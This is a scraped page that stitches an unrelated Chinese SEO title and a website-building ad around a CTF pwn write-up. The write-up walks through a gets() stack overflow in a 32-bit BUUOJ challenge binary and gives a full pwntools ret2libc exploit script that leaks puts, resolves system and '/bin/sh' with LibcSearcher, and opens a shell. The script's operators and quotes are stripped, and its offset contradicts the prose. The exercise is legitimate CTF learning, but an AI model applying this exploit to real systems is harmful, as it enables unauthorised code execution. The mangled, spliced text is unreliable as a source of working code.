如何建立网站的英文版广告发布计划怎么写
2026/3/24 18:27:38 网站建设 项目流程
如何建立网站的英文版,广告发布计划怎么写,哪个平台免费招人最快,目前网站开发语言首先checksec检查保护机制#xff1a;-32位程序-开启了栈不可执行机制然后使用反汇编工具IDA进行分析#xff1a;看到了vuln函数和左边的win1#xff0c;win2函数及flag函数#xff0c;第一眼看到就觉得能够从这些函数中获取flag#xff0c;但实际行不行呢#xff0c;先一…首先checksec检查保护机制-32位程序-开启了栈不可执行机制然后使用反汇编工具IDA进行分析看到了vuln函数和左边的win1win2函数及flag函数第一眼看到就觉得能够从这些函数中获取flag但实际行不行呢先一个一个点进去看一下vuln函数内部gets函数可触发栈溢出漏洞顺便算出偏移为0x18 0x8win1函数内部;使变量win1的值为1win2函数内部一些if-else的条件选择语句最后是flag函数内部可以发现要想从这里拿到flag必须要让win1win2和a1的值都等于-559039827但是前面的那几个函数都无法实现所以这几个函数一点作用也没有纯糊弄人呢由于在程序的反汇编代码中没有任何后门函数和system函数地址题目也没给libc库文件这里考虑泄露出某个函数的真实的地址再借助LibcSearcher这个插件找到libc库再计算出libc基址进而计算出system函数及/bin/sh的地址先在IDA中拿到vuln函数的地址方便后面二次使用栈溢出漏洞0x8048714然后就可以开始编写exp攻击脚本了第一次栈溢出先构造ROP链执行puts函数打印出puts函数的真实地址拿到后通过LibcSearcher找到libc库然后计算出libc基址后再计算出system函数和/bin/sh地址第二次栈溢出执行system函数后就能拿到shellfrom pwn import * from LibcSearcher import LibcSearcher context(archi386, oslinux, log_leveldebug) #io process(./pwn) # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io connect(node5.buuoj.cn,29484) # 与在线环境交互。 offset 0x18 0x4 vuln_addr 0x8048714 elf ELF(./pwn) puts_got elf.got[puts] puts_plt elf.plt[puts] io.recvuntil(bEnter your input ) payload ba*offset p32(puts_plt) p32(vuln_addr) p32(puts_got) io.sendline(payload) puts_addr u32(io.recv(4)) print(hex(puts_addr)) libc LibcSearcher(puts,puts_addr) libc_base puts_addr - libc.dump(puts) system_addr libc_base libc.dump(system) bin_sh_addr libc_base libc.dump(str_bin_sh) io.recvuntil(bEnter your input ) payload ba*offset p32(system_addr) p32(1) p32(bin_sh_addr) io.sendline(payload) io.interactive()这是运行结果这里要手动选择libc库32位程序就选择32位的libc库就行可能会选到不适配得到libc库多试几个就行了

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询